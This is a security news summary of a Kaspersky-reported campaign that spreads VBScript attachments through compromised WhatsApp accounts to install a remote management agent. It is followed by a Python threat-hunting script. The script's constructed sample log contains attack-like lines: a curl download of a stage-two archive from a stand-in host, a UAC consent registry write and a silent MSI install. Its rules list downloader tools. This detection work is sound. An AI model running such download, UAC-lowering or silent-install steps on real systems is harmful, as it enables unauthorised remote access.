
Kaspersky researchers have uncovered an ongoing malware campaign that uses compromised WhatsApp accounts to distribute malicious VBScript attachments.
The attachments install ManageEngine Endpoint Central, a legitimate remote management tool that can provide attackers with remote access to infected systems. The campaign has affected users in multiple countries, with Malaysia accounting for approximately 80% of observed infections.
Kaspersky found that compromised WhatsApp accounts were sending malicious attachments to contacts without accompanying messages, indicating that attackers were leveraging trusted relationships to increase the likelihood of execution. The method used to compromise the accounts remains unknown.
The malicious files are disguised as business and financial documents, using names such as “Financial Reports.vbs,” “Account Statement.vbs,” and “Outstanding Payment List.vbs.” Kaspersky also observed localized variants in Portuguese, French, German, and Malay, suggesting a broad international targeting effort.

The campaign primarily targets WhatsApp Desktop and WhatsApp Web users. Infection requires user interaction: the recipient must download the attachment and then open it. Once executed, the VBScript runs under Windows Script Host (WScript.exe), creates hidden directories under C:\Users\Public\Documents\, and downloads additional payloads from attacker-controlled infrastructure.
Kaspersky observed extensive obfuscation techniques, including encoded scripts, randomized variable names, junk code, and string reconstruction. Some variants also abuse legitimate Windows utilities such as curl.exe, bitsadmin.exe, certutil.exe, and PowerShell to retrieve additional payloads.
The second stage consists of two VBScript files. One repeatedly attempts to modify the Windows User Account Control (UAC) setting ConsentPromptBehaviorAdmin, which controls how UAC prompts members of the local Administrators group; lowering it reduces or removes the consent prompt for later administrative actions. Because the value lives under HKLM, the write only succeeds once the user has granted the script elevated privileges, which explains the repeated attempts. The other downloads and extracts a ZIP archive containing the next-stage payload.
The final payload installs ManageEngine Endpoint Central, a legitimate enterprise endpoint management platform used for software deployment, remote support, and system administration. The archive contains the Endpoint Central agent installer (UEMSAgent.msi), certificates, configuration files, and a malicious launcher script (setup1.vbs) that silently installs the agent using msiexec.exe.

Analysis of the embedded DCAgentServerInfo.json file revealed several management servers, including one IP address previously linked to ValleyRAT and Gh0st RAT infrastructure. However, Kaspersky said the evidence is insufficient to attribute the activity to a known threat actor.
The campaign has been observed targeting users in Malaysia, Brazil, India, Mexico, Singapore, the United Kingdom, Spain, Taiwan, Australia, Russia, and Vietnam. While Kaspersky found multiple VBScript samples containing simplified Chinese comments and notes, the company assesses only with low confidence that the operation is being conducted by a Chinese-speaking actor.
WhatsApp users should avoid opening script files received through messaging apps, even when they come from known contacts. Unexpected documents should be verified through a separate channel, and organizations should monitor for unauthorized installations of remote management software, including Endpoint Central agents.
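The chain described above (a script host launched from a downloads folder, LOLBin downloaders spawned by WScript.exe, staging under C:\Users\Public\Documents\, a write to ConsentPromptBehaviorAdmin, and a silent msiexec install of UEMSAgent.msi) maps onto a handful of process-creation and registry-set events. The following hunting script is an added example, not Kaspersky's code or tooling: it runs those checks over Sysmon-style events. The event lines are constructed to mirror the article's description; the `.x` staging directory name, the 203.0.113.10 download host, the `bob` user and the rule names are assumptions for illustration, not indicators from the report.

```python
"""Hunt for the VBScript -> Endpoint Central agent chain in Sysmon-style events.

Added example. Event IDs follow Sysmon: 1 = process create, 13 = registry value set.
The log below is constructed to mirror the behaviour the article describes; it is
not real telemetry, and the directory/host names in it are made up.
"""
from __future__ import annotations

import json
import re
from typing import Iterator

SAMPLE_LOG = r"""
{"eid":1,"image":"C:\\Windows\\System32\\WScript.exe","parent":"C:\\Windows\\explorer.exe","cmd":"\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\bob\\Downloads\\Financial Reports.vbs\""}
{"eid":1,"image":"C:\\Windows\\System32\\curl.exe","parent":"C:\\Windows\\System32\\WScript.exe","cmd":"curl.exe -s -o C:\\Users\\Public\\Documents\\.x\\stage2.zip http://203.0.113.10/a"}
{"eid":13,"image":"C:\\Windows\\System32\\WScript.exe","target":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin","details":"DWORD (0x00000000)"}
{"eid":1,"image":"C:\\Windows\\System32\\msiexec.exe","parent":"C:\\Windows\\System32\\WScript.exe","cmd":"msiexec.exe /i C:\\Users\\Public\\Documents\\.x\\UEMSAgent.msi /qn"}
{"eid":1,"image":"C:\\Windows\\System32\\WScript.exe","parent":"C:\\Windows\\explorer.exe","cmd":"WScript.exe C:\\Scripts\\logon.vbs"}
{"eid":1,"image":"C:\\Windows\\System32\\certutil.exe","parent":"C:\\Windows\\System32\\cmd.exe","cmd":"certutil -hashfile C:\\tools\\image.iso SHA256"}
"""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# LOLBins the article says some variants use to fetch follow-on payloads.
DOWNLOADERS = {"curl.exe", "bitsadmin.exe", "certutil.exe", "powershell.exe"}
# Assumed user-writable drop locations a messaging client or browser saves to.
UNTRUSTED_DIRS = ("\\downloads\\", "\\appdata\\local\\temp\\")
STAGING_DIR = "c:\\users\\public\\documents\\"
UAC_VALUE = "\\policies\\system\\consentpromptbehavioradmin"


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(log_text: str) -> Iterator[dict]:
    """Yield one event dict per non-empty JSON line."""
    for raw in log_text.splitlines():
        raw = raw.strip()
        if raw:
            yield json.loads(raw)


def classify(ev: dict) -> list[str]:
    """Return the names of every hunting rule this single event trips."""
    hits: list[str] = []
    image = basename(ev.get("image", ""))
    parent = basename(ev.get("parent", ""))
    cmd = ev.get("cmd", "").lower()
    if ev.get("eid") == 1:
        # A .vbs opened from a download/temp path via the script host (the lure).
        if image in SCRIPT_HOSTS and ".vbs" in cmd and any(d in cmd for d in UNTRUSTED_DIRS):
            hits.append("vbs_from_download_dir")
        # Script host spawning a LOLBin downloader (second-stage retrieval).
        if parent in SCRIPT_HOSTS and image in DOWNLOADERS:
            hits.append("script_host_spawns_downloader")
        # Anything touching the staging directory family the article names.
        if STAGING_DIR in cmd:
            hits.append("public_documents_staging")
        # Silent install of the Endpoint Central agent MSI.
        if image == "msiexec.exe" and re.search(r"/(qn|quiet)", cmd) and "uemsagent.msi" in cmd:
            hits.append("silent_endpoint_central_agent_install")
    elif ev.get("eid") == 13:
        # A script host rewriting the UAC admin consent policy value.
        if ev.get("target", "").lower().endswith(UAC_VALUE) and image in SCRIPT_HOSTS:
            hits.append("uac_consent_prompt_modified_by_script")
    return hits


def hunt(log_text: str) -> list[tuple[int, str]]:
    """Run every rule over the log; returns (event number, rule) pairs in order."""
    findings: list[tuple[int, str]] = []
    for n, ev in enumerate(parse_events(log_text), start=1):
        for rule in classify(ev):
            findings.append((n, rule))
    return findings


if __name__ == "__main__":
    for n, rule in hunt(SAMPLE_LOG):
        print(f"event {n}: {rule}")
```

Each rule is deliberately narrow and fires on a different link of the chain, so a single match (for example, a legitimate Endpoint Central rollout producing only `silent_endpoint_central_agent_install`) can be triaged against change records, while two or more rules firing on one host within minutes is a strong signal. The two benign events at the end (a logon script outside a download path, and certutil used for hashing from cmd.exe) show the rules do not trip on ordinary script-host or certutil use.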